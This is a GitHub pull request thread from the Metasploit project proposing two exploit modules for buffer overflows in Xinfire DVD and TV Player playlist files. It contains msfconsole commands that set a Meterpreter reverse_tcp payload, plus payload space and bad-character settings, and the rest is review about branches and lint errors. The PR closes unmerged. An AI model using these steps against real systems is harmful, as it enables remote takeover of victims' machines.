Added 2 exploit module exploit/windows/fileformat/
rapid7/metasploit-framework pull request #13288
Opened 2020-04-19 08:53 UTC by metacom27

Vulnerable Application
open plf file on (playlist), and the vulnerability is triggered.

Targets
Win 7 and Win 10

Verification

use exploit/windows/fileformat/xinfire_dvd_player
set payload windows/meterpreter/reverse_tcp
set lhost (IP of Local Host)
exploit

use exploit/windows/fileformat/xinfire_tv_player
set payload windows/meterpreter/reverse_tcp
set lhost (IP of Local Host)
exploit

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost (IP of Local Host)
exploit

Video demo Buffer Overflow Xinfire DVD Player
https://youtu.be/IqTO7WNJO24

Video demo Buffer Overflow Xinfire TV Player Pro
https://youtu.be/ivBPLheOWy4

downloads software
https://download.cnet.com/Xinfire-TV-Player-Pro/3000-13632_4-75986988.html
https://download.cnet.com/Xinfire-DVD-Player-Professional/3000-13632_4-75984423.html

Tell us what this change does. If you're fixing a bug, please mention
the github issue number.

Please ensure you are submitting **from a unique branch** in your [repository](https://github.com/rapid7/metasploit-framework/pull/11086#issuecomment-445506416) to master in Rapid7's.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use exploit/windows/smb/ms08_067_netapi`
- [ ] ...
- [ ] **Verify** the thing does what it should
- [ ] **Verify** the thing does not do what it should not
- [ ] **Document** the thing and how it works ([Example](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/post/multi/gather/aws_keys.md))

2020-04-19 08:56 UTC, bcoles commented
It is required that code in your fork be merged **from a unique branch** in your repository to master in Rapid7's.  Please create a new branch in your fork of framework and resubmit this from that branch.

```
git checkout -b <BRANCH_NAME>
git push <your_fork_remote> <BRANCH_NAME>
```

This helps protect the process, ensure users are aware of commits on the branch being considered for merge, allows for a location for more commits to be offered without mingling with other contributor changes and allows contributors to make progress while a PR is still being reviewed.

Closing based on the this requirement, please do resubmit from a unique branch.

2020-04-19 09:38 UTC, bcoles reviewed
Please resolve msftidy issues.

```
[*] Running msftidy.rb in ./.git/hooks/post-merge mode

--- Checking new and changed module syntax with tools/dev/msftidy.rb ---

modules/exploits/windows/fileformat/xinfire_dvd_player.rb - [WARNING] Invalid EDB reference

modules/exploits/windows/fileformat/xinfire_dvd_player.rb - [WARNING] Invalid EDB reference

modules/exploits/windows/fileformat/xinfire_dvd_player.rb - [INFO] No CVE references found. Please check before you land!

modules/exploits/windows/fileformat/xinfire_dvd_player.rb:16 - [WARNING] Spaces at EOL

modules/exploits/windows/fileformat/xinfire_dvd_player.rb:16 - [WARNING] Tabbed indent: "\t\tThis module exploits a stack-based buffer overflow on Xinfire DVD Player Pro and Standard.The vulnerability is triggered when opening \n"

modules/exploits/windows/fileformat/xinfire_dvd_player.rb:17 - [WARNING] Tabbed indent: "\t\ta malicious PLF file on Playlist.Tested successfully on Win7, Win10.This software is similar as DVD X Player and BlazeDVD.\n"

modules/exploits/windows/fileformat/xinfire_dvd_player.rb - [WARNING] Please add a newline at the end of the file

modules/exploits/windows/fileformat/xinfire_tv_player.rb - [WARNING] Invalid EDB reference

modules/exploits/windows/fileformat/xinfire_tv_player.rb - [WARNING] Invalid EDB reference

modules/exploits/windows/fileformat/xinfire_tv_player.rb - [INFO] No CVE references found. Please check before you land!

modules/exploits/windows/fileformat/xinfire_tv_player.rb:16 - [WARNING] Spaces at EOL

modules/exploits/windows/fileformat/xinfire_tv_player.rb:16 - [WARNING] Tabbed indent: "\t\tThis module exploits a stack-based buffer overflow on Xinfire TV Player Pro and Standard.The vulnerability is triggered when opening \n"

modules/exploits/windows/fileformat/xinfire_tv_player.rb:17 - [WARNING] Tabbed indent: "\t\ta malicious PLF file on Playlist.Tested successfully on Win7, Win10.This software is similar as Aviosoft Digital TV Player and BlazeVideo HDTV Player.\n"

modules/exploits/windows/fileformat/xinfire_tv_player.rb:42 - [WARNING] Spaces at EOL

modules/exploits/windows/fileformat/xinfire_tv_player.rb - [WARNING] Please add a newline at the end of the file

------------------------------------------------------------------------
```

2020-04-19 09:38 UTC, bcoles commented on modules/exploits/windows/fileformat/xinfire_dvd_player.rb
> +          [ 'EDB', '<insert another link to the exploit/advisory here>']
todo

2020-04-19 09:38 UTC, bcoles commented on modules/exploits/windows/fileformat/xinfire_tv_player.rb
> +          [ 'EDB', '<insert another link to the exploit/advisory here>']
todo

2020-04-19 09:38 UTC, bcoles commented on modules/exploits/windows/fileformat/xinfire_tv_player.rb
> +          'metacom' # MSF Module
```suggestion
          'metacom' # Discovery and Metasploit module # metacom27@gmail.com - twitter.@m3tac0m
```

2020-04-19 09:38 UTC, bcoles commented on modules/exploits/windows/fileformat/xinfire_dvd_player.rb
> +          'metacom' # MSF Module
```suggestion
          'metacom' # Discovery and Metasploit module # metacom27@gmail.com - twitter.@m3tac0m
```

2020-04-19 09:38 UTC, bcoles commented on modules/exploits/windows/fileformat/xinfire_tv_player.rb
> +        },
```suggestion
      'Payload'        =>
        {
          'Space' => 1384,
          'BadChars' => "\x00\x0a\x0d\x1a\x2f\x3a\x5c",
          'DisableNops' => true,
        },
```

2020-04-19 09:38 UTC, bcoles commented on modules/exploits/windows/fileformat/xinfire_dvd_player.rb
> +        },
Add `'Space'` for available payload space.

2020-04-19 12:35 UTC, metacom27 commented
now is everything okay?

2020-04-19 12:39 UTC, bcoles commented
> 
> 
> now is everything okay?

Please submit from a unique branch (not `master`).

Please also refer to the comments above regarding `msftidy` issues.

2020-04-19 12:52 UTC, bcoles requested changes
Please run `msftidy` on your modules and resolve any issues raised.

```
./tools/dev/msftidy.rb path/to/your/module.rb
```

Please submit from a unique branch, not master.  #11224

2020-04-19 17:28 UTC, metacom27 commented
thank you very much bcoles
 now the errors are gone

2020-04-19 18:17 UTC, bcoles reviewed
This PR is still based on the `master` branch. Please submit a new PR from a different branch.

Also, please split the two modules into two different PRs. This will help speed up testing and merging the modules.

Also, there are still a bunch of `mstfidy` issues. It looks like each line uses `\r\n` rather than `\n`.

Also, I'm not sure what changes you've made to the `shaper_pdf_bof`. It looks like the whole file has been replaced. If you want to make changes to the module, please submit this as a separate PR.

2020-04-19 18:30 UTC, metacom27 commented
I tested the modules with mstfidy and it shows me no error.

2020-04-19 18:46 UTC, bcoles commented
> 
> 
> I tested the modules with mstfidy and it shows me no error.

I presume you've copy and pasted the file contents using the GitHub web interface.

The automated Travis CI tests failed:

https://travis-ci.org/github/rapid7/metasploit-framework/builds/676964780?utm_source=github_status&utm_medium=notification

![Travis](https://user-images.githubusercontent.com/434827/79696707-ba0dff80-82c1-11ea-8a12-7650a4c41e92.png)

2020-04-19 18:54 UTC, metacom27 commented
yes with GitHub web interface

I'll delete it and I'll try again

2020-04-19 19:06 UTC, closed without merging

2020-04-22 15:22 UTC, bcoles commented
#13307